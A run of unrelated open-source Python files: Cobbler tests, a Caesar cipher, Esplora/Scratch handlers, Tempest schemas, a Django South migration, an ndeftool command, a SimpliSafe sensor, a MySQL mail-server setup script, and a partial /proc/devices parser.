self.assertTrue(profile.set_distro("testdistro0"))
self.assertTrue(profile.set_kickstart("http://127.0.0.1/foo"))
self.assertTrue(profile.set_virt_bridge("xenbr1"))
# sizes must be integers
self.assertTrue(profile.set_virt_file_size("54321"))
self.failUnlessRaises(Exception, profile.set_virt_file_size, "huge")
self.failUnlessRaises(Exception, profile.set_virt_file_size, "54.321")
# cpus must be integers
self.assertTrue(profile.set_virt_cpus("2"))
self.failUnlessRaises(Exception, profile.set_virt_cpus, "3.14")
self.failUnlessRaises(Exception, profile.set_virt_cpus, "6.02*10^23")
self.assertTrue(self.api.profiles().add(profile))
def test_inheritance_and_variable_propogation(self):
# STEP ONE: verify that non-inherited objects behave
# correctly with ks_meta (we picked this attribute
# because it's a hash and it's a bit harder to handle
# than strings). It should be passed down the render
# tree to all subnodes
repo = self.api.new_repo()
try:
os.makedirs("/tmp/test_cobbler_repo")
except:
pass
fd = open("/tmp/test_cobbler_repo/test.file", "w+")
fd.write("hello!")
fd.close()
self.assertTrue(repo.set_name("testrepo"))
self.assertTrue(repo.set_mirror("/tmp/test_cobbler_repo"))
self.assertTrue(self.api.repos().add(repo))
profile = self.api.new_profile()
self.assertTrue(profile.set_name("testprofile12b2"))
self.assertTrue(profile.set_distro("testdistro0"))
self.assertTrue(profile.set_kickstart("http://127.0.0.1/foo"))
self.assertTrue(profile.set_repos(["testrepo"]))
self.assertTrue(self.api.profiles().add(profile))
self.api.reposync()
self.api.sync()
system = self.api.new_system()
self.assertTrue(system.set_name("foo"))
self.assertTrue(system.set_profile("testprofile12b2"))
self.assertTrue(system.set_ksmeta({"asdf" : "jkl" }))
self.assertTrue(self.api.systems().add(system))
profile = self.api.profiles().find("testprofile12b2")
ksmeta = profile.ks_meta
self.assertFalse(ksmeta.has_key("asdf"))
# FIXME: do the same for inherited profiles
# now verify the same for an inherited profile
# and this time walk up the tree to verify it wasn't
# applied to any other object except the base.
profile2 = self.api.new_profile(is_subobject=True)
profile2.set_name("testprofile12b3")
profile2.set_parent("testprofile12b2")
self.assertTrue(self.api.profiles().add(profile2))
self.api.reposync()
self.api.sync()
# FIXME: now add a system to the inherited profile
# and set a attribute on it that we will later check for
system2 = self.api.new_system()
self.assertTrue(system2.set_name("foo2"))
self.assertTrue(system2.set_profile("testprofile12b3"))
self.assertTrue(system2.set_ksmeta({"narf" : "troz"}))
self.assertTrue(self.api.systems().add(system2))
self.api.reposync()
self.api.sync()
# FIXME: now evaluate the system object and make sure
# that it has inherited the repos value from the superprofile
# above it's actual profile. This should NOT be present in the
# actual object, which we have not modified yet.
data = utils.blender(self.api, False, system2)
self.assertTrue(data["repos"] == ["testrepo"])
self.assertTrue(self.api.profiles().find(system2.profile).repos == "<<inherit>>")
# now if we set the repos object of the system to an additional
# repo we should verify it now contains two repos.
# (FIXME)
repo2 = self.api.new_repo()
try:
os.makedirs("/tmp/cobbler_test_repo")
except:
pass
fd = open("/tmp/cobbler_test_repo/file.test","w+")
fd.write("Hi!")
fd.close()
self.assertTrue(repo2.set_name("testrepo2"))
self.assertTrue(repo2.set_mirror("/tmp/cobbler_test_repo"))
self.assertTrue(self.api.repos().add(repo2))
profile2 = self.api.profiles().find("testprofile12b3")
# note: side check to make sure we can also set to string values
profile2.set_repos("testrepo2")
self.api.profiles().add(profile2) # save it
# random bug testing: run sync several times and ensure cardinality doesn't change
self.api.reposync()
self.api.sync()
self.api.sync()
self.api.sync()
data = utils.blender(self.api, False, system2)
self.assertTrue("testrepo" in data["repos"])
self.assertTrue("testrepo2" in data["repos"])
self.assertTrue(len(data["repos"]) == 2)
self.assertTrue(self.api.profiles().find(system2.profile).repos == ["testrepo2"])
# now double check that the parent profile still only has one repo in it.
# this is part of our test against upward propogation
profile = self.api.profiles().find("testprofile12b2")
self.assertTrue(len(profile.repos) == 1)
self.assertTrue(profile.repos == ["testrepo"])
# now see if the subprofile does NOT have the ksmeta attribute
# this is part of our test against upward propogation
profile2 = self.api.profiles().find("testprofile12b3")
self.assertTrue(type(profile2.ks_meta) == type(""))
self.assertTrue(profile2.ks_meta == "<<inherit>>")
# now see if the profile above this profile still doesn't have it
profile = self.api.profiles().find("testprofile12b2")
self.assertTrue(type(profile.ks_meta) == type({}))
self.api.reposync()
self.api.sync()
self.assertFalse(profile.ks_meta.has_key("narf"), "profile does not have the system ksmeta")
self.api.reposync()
self.api.sync()
# verify that the distro did not acquire the property
# we just set on the leaf system
distro = self.api.distros().find("testdistro0")
self.assertTrue(type(distro.ks_meta) == type({}))
self.assertFalse(distro.ks_meta.has_key("narf"), "distro does not have the system ksmeta")
# STEP THREE: verify that inheritance appears to work
# by setting ks_meta on the subprofile and seeing
# if it appears on the leaf system ... must use
# blender functions
profile2 = self.api.profiles().find("testprofile12b3")
profile2.set_ksmeta({"canyouseethis" : "yes" })
self.assertTrue(self.api.profiles().add(profile2))
system2 = self.api.systems().find("foo2")
data = utils.blender(self.api, False, system2)
self.assertTrue(data.has_key("ks_meta"))
self.assertTrue(data["ks_meta"].has_key("canyouseethis"))
# STEP FOUR: do the same on the superprofile and see
# if that propogates
profile = self.api.profiles().find("testprofile12b2")
profile.set_ksmeta({"canyouseethisalso" : "yes" })
self.assertTrue(self.api.profiles().add(profile))
system2 = self.api.systems().find("foo2")
data = utils.blender(self.api, False, system2)
self.assertTrue(data.has_key("ks_meta"))
self.assertTrue(data["ks_meta"].has_key("canyouseethisalso"))
# STEP FIVE: see if distro attributes propogate
distro = self.api.distros().find("testdistro0")
distro.set_ksmeta({"alsoalsowik" : "moose" })
self.assertTrue(self.api.distros().add(distro))
system2 = self.api.systems().find("foo2")
data = utils.blender(self.api, False, system2)
self.assertTrue(data.has_key("ks_meta"))
self.assertTrue(data["ks_meta"].has_key("alsoalsowik"))
# STEP SEVEN: see if settings changes also propogate
# TBA
def test_system_name_is_a_MAC(self):
system = self.api.new_system()
name = "00:16:41:14:B7:71"
self.assertTrue(system.set_name(name))
self.assertTrue(system.set_profile("testprofile0"))
self.assertTrue(self.api.systems().add(system))
self.assertTrue(self.api.systems().find(name=name))
self.assertTrue(self.api.systems().find(mac_address="00:16:41:14:B7:71"))
self.assertFalse(self.api.systems().find(mac_address="thisisnotamac"))
def test_system_name_is_an_IP(self):
system = self.api.new_system()
name = "192.168.1.54"
self.assertTrue(system.set_name(name))
self.assertTrue(system.set_profile("testprofile0"))
self.assertTrue(self.api.systems().add(system))
self.assertTrue(self.api.systems().find(name=name))
def test_invalid_system_non_referenced_profile(self):
system = self.api.new_system()
self.assertTrue(system.set_name("drwily.rdu.redhat.com"))
self.failUnlessRaises(CobblerException, system.set_profile, "profiledoesntexist")
self.failUnlessRaises(CobblerException, self.api.systems().add, system)
class SyncContents(BootTest):
def test_blender_cache_works(self):
# this is just a file that exists that we don't have to create
fake_file = "/etc/hosts"
distro = self.api.new_distro()
self.assertTrue(distro.set_name("D1"))
self.assertTrue(distro.set_kernel(fake_file))
self.assertTrue(distro.set_initrd(fake_file))
self.assertTrue(self.api.distros().add(distro, with_copy=True))
self.assertTrue(self.api.distros().find(name="D1"))
profile = self.api.new_profile()
self.assertTrue(profile.set_name("P1"))
self.assertTrue(profile.set_distro("D1"))
self.assertTrue(profile.set_kickstart(fake_file))
self.assertTrue(self.api.profiles().add(profile, with_copy=True))
self.assertTrue(self.api.profiles().find(name="P1"))
system = self.api.new_system()
self.assertTrue(system.set_name("S1"))
self.assertTrue(system.set_mac_address("BB:EE:EE:EE:EE:FF","intf0"))
self.assertTrue(system.set_profile("P1"))
self.assertTrue(self.api.systems().add(system, with_copy=True))
self.assertTrue(self.api.systems().find(name="S1"))
# ensure that the system after being added has the right template data
# in /tftpboot
converted="01-bb-ee-ee-ee-ee-ff"
if os.path.exists("/var/lib/tftpboot"):
fh = open("/var/lib/tftpboot/pxelinux.cfg/%s" % converted)
else:
fh = open("/tftpboot/pxelinux.cfg/%s" % converted)
data = fh.read()
self.assertTrue(data.find("/op/ks/") != -1)
fh.close()
# ensure that after sync is applied, the blender cache still allows
# the system data to persist over the profile data in /tftpboot
# (which was an error we had in 0.6.3)
self.api.sync()
if os.path.exists("/var/lib/tftpboot"):
fh = open("/var/lib/tftpboot/pxelinux.cfg/%s" % converted)
else:
fh = open("/tftpboot/pxelinux.cfg/%s" % converted)
data = fh.read()
self.assertTrue(data.find("/op/ks/") != -1)
fh.close()
class Deletions(BootTest):
def test_invalid_delete_profile_doesnt_exist(self):
self.failUnlessRaises(CobblerException, self.api.profiles().remove, "doesnotexist")
def test_invalid_delete_profile_would_orphan_systems(self):
self.make_basic_config()
self.failUnlessRaises(CobblerException, self.api.profiles().remove, "testprofile0")
def test_invalid_delete_system_doesnt_exist(self):
self.failUnlessRaises(CobblerException, self.api.systems().remove, "doesnotexist")
def test_invalid_delete_distro_doesnt_exist(self):
self.failUnlessRaises(CobblerException, self.api.distros().remove, "doesnotexist")
def test_invalid_delete_distro_would_orphan_profile(self):
self.make_basic_config()
self.failUnlessRaises(CobblerException, self.api.distros().remove, "testdistro0")
def test_working_deletes(self):
self.api.clear()
self.make_basic_config()
self.assertTrue(self.api.systems().remove("drwily.rdu.redhat.com"))
self.api.serialize()
self.assertTrue(self.api.profiles().remove("testprofile0"))
self.assertTrue(self.api.distros().remove("testdistro0"))
self.assertFalse(self.api.systems().find(name="drwily.rdu.redhat.com"))
self.assertFalse(self.api.profiles().find(name="testprofile0"))
self.assertFalse(self.api.distros().find(name="testdistro0"))
class TestCheck(BootTest):
def test_check(self):
# we can't know if it's supposed to fail in advance
# (ain't that the halting problem), but it shouldn't ever
# throw exceptions.
self.api.check()
class TestSync(BootTest):
def test_real_run(self):
# syncing a real test run in an automated environment would
# break a valid cobbler configuration, so we're not going to
# test this here.
pass
class TestListings(BootTest):
def test_listings(self):
# check to see if the collection listings output something.
# this is a minimal check, mainly for coverage, not validity
self.make_basic_config()
self.assertTrue(len(self.api.systems().printable()) > 0)
self.assertTrue(len(self.api.profiles().printable()) > 0)
self.assertTrue(len(self.api.distros().printable()) > 0)
#class TestCLIBasic(BootTest):
#
# def test_cli(self):
# # just invoke the CLI to increase coverage and ensure
# # nothing major is broke at top level. Full CLI command testing
# # is not included (yet) since the API tests hit that fairly throughly
# # and it would easily double the length of the tests.
# app = "/usr/bin/python"
# self.assertTrue(subprocess.call([app,"cobbler/cobbler.py","list"]) == 0)
if __name__ == "__main__":
if not os.path.exists("setup.py"):
print "tests: must invoke from top level directory"
sys.exit(1)
loader = unittest.defaultTestLoader
test_module = __import__("tests") # self import considered harmful?
tests = loader.loadTestsFromModule(test_module)
runner = unittest.TextTestRunner()
runner.run(tests)
sys.exit(0)
| brenton/cobbler | tests/tests.py | Python | gpl-2.0 | 37,355 |
# Caesar Cipher
SYMBOLS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
MAX_KEY_SIZE = len(SYMBOLS)
def getMode():
while True:
print('Do you wish to encrypt or decrypt a message?')
mode = input().lower()
if mode in ['encrypt', 'e', 'decrypt', 'd']:
return mode
else:
print('Enter either "encrypt" or "e" or "decrypt" or "d".')
def getMessage():
print('Enter your message:')
return input()
def getKey():
key = 0
while True:
print('Enter the key number (1-%s)' % (MAX_KEY_SIZE))
key = int(input())
if (key >= 1 and key <= MAX_KEY_SIZE):
return key
def getTranslatedMessage(mode, message, key):
if mode[0] == 'd':
key = -key
translated = ''
for symbol in message:
symbolIndex = SYMBOLS.find(symbol)
if symbolIndex == -1: # Symbol not found in SYMBOLS.
# Just add this symbol without any change.
translated += symbol
else:
# Encrypt or decrypt
symbolIndex += key
if symbolIndex >= len(SYMBOLS):
symbolIndex -= len(SYMBOLS)
elif symbolIndex < 0:
symbolIndex += len(SYMBOLS)
translated += SYMBOLS[symbolIndex]
return translated
mode = getMode()
message = getMessage()
key = getKey()
print('Your translated text is:')
print(getTranslatedMessage(mode, message, key))
| triplefox/2017STDIOGameJam | asweigart/caesar_cipher/cipher.py | Python | mit | 1,452 |
# -*- coding: utf-8 -*-
"""
Created on Feb 14 13:17:15 2015
@author: Alan Yorinks
Copyright (c) 2015 Alan Yorinks All right reserved.
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public
License as published by the Free Software Foundation; either
version 3 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import logging
import datetime
from collections import deque
from esp4s_serial import EspSerial
import esp4s_http_server
class Esp4sCommandHandlers:
"""
This class processes any command received from Scratch 2.0
If commands need to be added in the future, a command handler method is
added to this file and the command_dict at the end of this file is
updated to contain the method. Command names must be the same in the json .s2e Scratch
descriptor file.
"""
# class variables
port_id = ""
baud_rate = 57600
timeout = 1
esplora = None
report = []
snap_report = {}
scratch_report = []
def __init__(self, com_port):
"""
Instantiate the command handler
:param com_port: Communications port for esplora communication
:return: None
"""
self.com_port = com_port
self.first_poll_received = False
self.first_command_received = False
self.command_deque = deque()
self.debug = 0
# open the serial interface and start the receive thread
self.esplora = EspSerial(com_port, self.command_deque)
self.esplora.open()
self.esplora.start()
def start_http_server(self):
"""
Start up the HTTP server
:return: None
"""
esp4s_http_server.start_server(self)
def do_command(self, command):
"""
This method looks up the command that resides in element zero of the command list
within the command dictionary and executes the method for the command.
Each command returns string that will be eventually be sent to Scratch
:param command: Command sent from Scratch/Snap!
:return: HTTP response string
"""
if not self.first_command_received:
# start the sensor data flowing
self.esplora.write("C")
self.first_command_received = True
method = self.command_dict.get(command[0])
if command[0] != "poll":
# turn on debug logging if requested
if self.debug == 'On':
debug_string = "DEBUG: "
debug_string += str(datetime.datetime.now())
debug_string += ": "
for data in command:
debug_string += "".join(map(str, data))
debug_string += ' '
logging.debug(debug_string)
print (debug_string)
rval = self.execute_command(method, command)
return rval
def execute_command(self, method, command):
"""
Look up the command in command table and return it's method.
:param method: The method to execute
:param command: Command sent from Scratch/Snap!
:return: HTTP response string
"""
return method(self, command)
def orientation(self, command):
"""
Set the orientation of the esplora
:param command:
:return:"okay"
"""
self.esplora.set_orientation(command[1])
return 'okay'
def temp_units(self, command):
"""
Set the temperature units
:param command:
:return:"okay"
"""
self.esplora.set_temp_units(command[1])
return 'okay'
# noinspection PyUnusedLocal
def poll(self, command):
"""
This method scans the data tables and assembles data for all reporter
blocks and returns the data to the caller.
:param command: Command sent from Scratch/Snap!
:return: HTTP response string
"""
if not self.first_poll_received:
logging.info('Scratch detected! Ready to rock and roll...')
print ('Scratch detected! Ready to rock and roll...')
self.first_poll_received = True
# retrieve sensor status from the esplora
responses = ''
if self.pop_status():
responses = ''.join(self.scratch_report)
if responses == '':
responses = 'okay'
return responses
else:
return 'okay'
def pop_status(self):
"""
Get the latest status from the deque
:return: True if status is available, False if it is not
"""
while len(self.command_deque) != 0:
self.report = self.command_deque.popleft()
if len(self.report) != 0:
self.scratch_report = self.report[0]
self.snap_report = self.report[1]
return True
else:
return False
# noinspection PyUnusedLocal
def send_cross_domain_policy(self, command):
"""
This method returns cross domain policy back to Scratch upon request.
It keeps Flash happy. It is here as a place holder if Scratch allows
the HTTP extensions to be used on the on-line version
:param command: Command sent from Scratch/Snap!
:return: HTTP response string
"""
policy = "<cross-domain-policy>\n"
policy += " <allow-access-from domain=\"*\" to-ports=\""
policy += str(self.com_port)
policy += "\"/>\n"
policy += "</cross-domain-policy>\n\0"
return policy
# noinspection PyMethodMayBeStatic,PyUnusedLocal
def reset_esplora(self, command):
"""
Kill tone
:param command: Command sent from Scratch/Snap!
:return: HTTP response string
"""
self.esplora.write("T0")
return "okay"
# noinspection PyMethodMayBeStatic
def set_board_led(self, command):
"""
This method control the D13 board LED
:param command: Command sent from Scratch/Snap!f
:return: HTTP response string
"""
if command[1] == 'On':
self.esplora.write("L 1")
else:
self.esplora.write("L 0")
return 'okay'
# normal esp4s_http return for commands
# noinspection PyMethodMayBeStatic
def set_leds(self, command):
"""
This method controls the RGB LEDs
:param command: Command sent from Scratch/Snap!
:return: HTTP response string
"""
command_string = None
if command[1] == "Red":
command_string = "R"
elif command[1] == "Green":
command_string = "G"
elif command[1] == "Blue":
command_string = "B"
if command_string is not None:
command_string += command[2]
self.esplora.write(command_string)
return 'okay'
# noinspection PyMethodMayBeStatic
def play_tone(self, command):
"""
This will play a tone continuously at the specified frequency.
To Turn off tone, set the frequency to 0.
:param command: Command sent from Scratch/Snap!
:return: HTTP response string
"""
tone_chart = {"C": "523", "C_Sharp--D_Flat": "554", "D": "587", "D_Sharp--E_Flat": "622",
"E": "659", "F": "698", "F_Sharp--G_Flat": "740", "G": "783",
"G_Sharp--A_Flat": "831",
"A": "880", "A_Sharp--B_Flat": "932", "B": "958", "Note_Off": "0"}
command_string = "T"
command_string += tone_chart[command[1]]
self.esplora.write(command_string)
return 'okay'
def continuous_tone(self, command):
command_string = "T"
command_string += command[1]
self.esplora.write(command_string)
return 'okay'
# noinspection PyMethodMayBeStatic
def tinker_output(self, command):
"""
Output data to the tinkerKit A or B output channel
:param command: Command sent from Scratch/Snap!
:return: HTTP response string
"""
if command[1] == 'A':
command_string = 'Y'
command_string += command[2]
else:
command_string = 'Z'
command_string += command[2]
self.esplora.write(command_string)
return 'okay'
def get_snap_status(self, command):
"""
This method allows status retrieval for the non-polling Snap! application
:param command: Command sent from Scratch/Snap!
:return: HTTP response string
"""
if self.pop_status():
if len(self.snap_report) != 0:
if len(command) == 1:
report_entry = self.snap_report[command[0]]
else:
report_entry = self.snap_report[command[1]]
return report_entry
else:
return 'okay'
else:
return 'okay'
# This table must be at the bottom of the file because Python does not provide forward referencing for
# the methods defined above.
# noinspection PyPep8
command_dict = {'crossdomain.xml': send_cross_domain_policy, 'reset_all': reset_esplora,
'board_led': set_board_led, 'leds': set_leds, 'tinker_out': tinker_output,
'play_tone': play_tone, 'tone2': continuous_tone, 'orientation': orientation,
'temp_units': temp_units, 'poll': poll,
'buttons': get_snap_status, 'joystick': get_snap_status,
'accel': get_snap_status, 'slider': get_snap_status, 'light': get_snap_status,
'temp': get_snap_status, 'sound': get_snap_status, 'tkInput': get_snap_status
}
| MrYsLab/esp4s | esp4s_command_handlers.py | Python | gpl-3.0 | 10,277 |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from tempest.lib.api_schema.response.compute.v2_51 import servers as servers251
# ****** Schemas changed in microversion 2.54 *****************
# Note(gmann): This is schema for microversion 2.54 which includes the
# 'key_name' in the Response body of the following APIs:
# - ``POST '/servers/{server_id}/action (rebuild)``
key_name = {
'oneOf': [
{'type': 'string', 'minLength': 1, 'maxLength': 255},
{'type': 'null'},
]
}
rebuild_server = copy.deepcopy(servers251.rebuild_server)
rebuild_server['response_body']['properties']['server'][
'properties'].update({'key_name': key_name})
rebuild_server['response_body']['properties']['server'][
'required'].append('key_name')
rebuild_server_with_admin_pass = copy.deepcopy(
servers251.rebuild_server_with_admin_pass)
rebuild_server_with_admin_pass['response_body']['properties']['server'][
'properties'].update({'key_name': key_name})
rebuild_server_with_admin_pass['response_body']['properties']['server'][
'required'].append('key_name')
# NOTE(gmann): Below are the unchanged schema in this microversion. We need
# to keep this schema in this file to have the generic way to select the
# right schema based on self.schema_versions_info mapping in service client.
# ****** Schemas unchanged in microversion 2.54 since microversion 2.48 ***
get_server = copy.deepcopy(servers251.get_server)
list_servers_detail = copy.deepcopy(servers251.list_servers_detail)
update_server = copy.deepcopy(servers251.update_server)
list_servers = copy.deepcopy(servers251.list_servers)
show_server_diagnostics = copy.deepcopy(servers251.show_server_diagnostics)
get_remote_consoles = copy.deepcopy(servers251.get_remote_consoles)
list_tags = copy.deepcopy(servers251.list_tags)
update_all_tags = copy.deepcopy(servers251.update_all_tags)
delete_all_tags = copy.deepcopy(servers251.delete_all_tags)
check_tag_existence = copy.deepcopy(servers251.check_tag_existence)
update_tag = copy.deepcopy(servers251.update_tag)
delete_tag = copy.deepcopy(servers251.delete_tag)
attach_volume = copy.deepcopy(servers251.attach_volume)
show_volume_attachment = copy.deepcopy(servers251.show_volume_attachment)
list_volume_attachments = copy.deepcopy(servers251.list_volume_attachments)
show_instance_action = copy.deepcopy(servers251.show_instance_action)
create_backup = copy.deepcopy(servers251.create_backup)
| openstack/tempest | tempest/lib/api_schema/response/compute/v2_54/servers.py | Python | apache-2.0 | 2,965 |
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'Profile.converted_by'
db.alter_column(u'tango_in_blood_app_profile', 'converted_by_id', self.gf('django.db.models.fields.related.ForeignKey')(null=True, to=orm['auth.User']))
def backwards(self, orm):
# Changing field 'Profile.converted_by'
db.alter_column(u'tango_in_blood_app_profile', 'converted_by_id', self.gf('django.db.models.fields.related.ForeignKey')(default=0, to=orm['auth.User']))
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'tango_in_blood_app.profile': {
'Meta': {'object_name': 'Profile'},
'avatar': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'bio': ('django.db.models.fields.CharField', [], {'max_length': '6000', 'blank': 'True'}),
'conversion_password': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40', 'blank': 'True'}),
'converted_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'profile_converted_bys'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'profile_users'", 'to': u"orm['auth.User']"})
}
}
complete_apps = ['tango_in_blood_app'] | jhud/Tango-In-Blood | tango_in_blood_app/migrations/0002_auto__chg_field_profile_converted_by.py | Python | gpl-3.0 | 4,764 |
# -*- coding: utf-8 -*-
import click
import ndef
from ndeftool.cli import command_processor, dmsg
@click.command(short_help="Change the identifier of the last record.")
@click.argument('name')
@command_processor
def cmd(message, **kwargs):
"""The *identifier* command either changes the current last record's
name (NDEF Record ID) or, if the current message does not have any
records, creates a record with unknown record type and the given
record name.
\b
Examples:
ndeftool identifier 'record identifier' print
ndeftool text 'first' id 'r1' text 'second' id 'r2' print
"""
dmsg(__name__ + ' ' + str(kwargs))
if not message:
message = [ndef.Record('unknown')]
try:
message[-1].name = kwargs['name'].encode('latin', 'replace')
except ValueError as error:
raise click.ClickException(str(error))
return message
| nfcpy/ndeftool | src/ndeftool/commands/IDentifier.py | Python | isc | 902 |
"""Support for SimpliSafe freeze sensor."""
from simplipy.entity import EntityTypes
from homeassistant.const import DEVICE_CLASS_TEMPERATURE, TEMP_FAHRENHEIT
from homeassistant.core import callback
from . import SimpliSafeEntity
from .const import DATA_CLIENT, DOMAIN, LOGGER
async def async_setup_entry(hass, entry, async_add_entities):
"""Set up SimpliSafe freeze sensors based on a config entry."""
simplisafe = hass.data[DOMAIN][DATA_CLIENT][entry.entry_id]
sensors = []
for system in simplisafe.systems.values():
if system.version == 2:
LOGGER.info("Skipping sensor setup for V2 system: %s", system.system_id)
continue
for sensor in system.sensors.values():
if sensor.type == EntityTypes.temperature:
sensors.append(SimplisafeFreezeSensor(simplisafe, system, sensor))
async_add_entities(sensors)
class SimplisafeFreezeSensor(SimpliSafeEntity):
"""Define a SimpliSafe freeze sensor entity."""
def __init__(self, simplisafe, system, sensor):
"""Initialize."""
super().__init__(simplisafe, system, sensor.name, serial=sensor.serial)
self._sensor = sensor
self._state = None
self._device_info["identifiers"] = {(DOMAIN, sensor.serial)}
self._device_info["model"] = "Freeze Sensor"
self._device_info["name"] = sensor.name
@property
def device_class(self):
"""Return type of sensor."""
return DEVICE_CLASS_TEMPERATURE
@property
def unique_id(self):
"""Return unique ID of sensor."""
return self._sensor.serial
@property
def unit_of_measurement(self):
"""Return the unit of measurement."""
return TEMP_FAHRENHEIT
@property
def state(self):
"""Return the sensor state."""
return self._state
@callback
def async_update_from_rest_api(self):
"""Update the entity with the provided REST API data."""
self._state = self._sensor.temperature
| balloob/home-assistant | homeassistant/components/simplisafe/sensor.py | Python | apache-2.0 | 2,020 |
__author__ = 'Jody Shumaker'
| jshumaker/LoA | utility/__init__.py | Python | mit | 29 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os, subprocess
import sys, traceback
import crypt
print("Kopiere: .my.cnf kann das Passwort und Benutzername von MySQL-Nutzern hinterlegt werden. Achtung: Sicherheitsrisiko!")
cmd1 = os.system("cp my.cnf ~/.my.cnf")
# Update Upgrade
print("Update und Upgrade des Betriebssystems")
print("Namen 'mail' für den Server festlegen")
cmd1 = os.system("echo 'mail' > /etc/hostname")
datei = open("/etc/hosts", "a")
datei.write("127.0.0.1 mail.mysystems.tld mail localhost.localdomain localhost\n")
datei.write("::1 mail.mysystems.tld mail localhost.localdomain ip6-localhost\n")
datei.close()
print("Hostname für E-Mail-Server setzen")
cmd1 = os.system("echo $(hostname -f) > /etc/mailname")
cmd1 = os.system("apt-get update -qq && sudo apt-get upgrade -y -qq")
print(" Passwort und Benutzer für mysql festlegen: fbs/bs")
cmd1 = os.system("debconf-set-selections <<< 'mysql-server mysql-server/root_password password fbs'")
cmd1 = os.system("debconf-set-selections <<< 'mysql-server mysql-server/root_password_again password fbs'")
print(" Datenbank installieren")
cmd1 = os.system("apt install mysql-server -y")
print(" Datenbank vmail anlegen.")
cmd1 = os.system("mysql -u root -pfbs -e 'create database vmail;'")
print("Benutzer vmail anlegen.")
cmd1 = os.system("mysql -u root -pfbs -e 'GRANT ALL ON vmail.* TO 'vmail'@'localhost' IDENTIFIED BY 'fbs';'")
print("Tabellen anlegen")
cmd1 = os.system("mysql 'vmail' < 'mysql'")
| joergre/workshops | LF7/EMail/1Stunde.py | Python | cc0-1.0 | 1,487 |
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
The devices file.
"""
class Devices:
def __init__(self):
fo = open("/proc/devices")
self._charmap = {}
self._blockmap = {}
for line in fo.readlines():
if line.startswith("Character"):
curmap = self._charmap
continue
elif line.startswith("Block"):
curmap = self._blockmap
continue
elif len(line) > 4:
[num, fmt] = line.split()
num = int(num)
curmap[num] = fmt
def __str__(self):
s = ["Character devices:"]
for num, fmt in self._charmap.items():
s.append("%3d %s" % (num, fmt))
s.append("\nBlock devices:")
for num, fmt in self._blockmap.items():
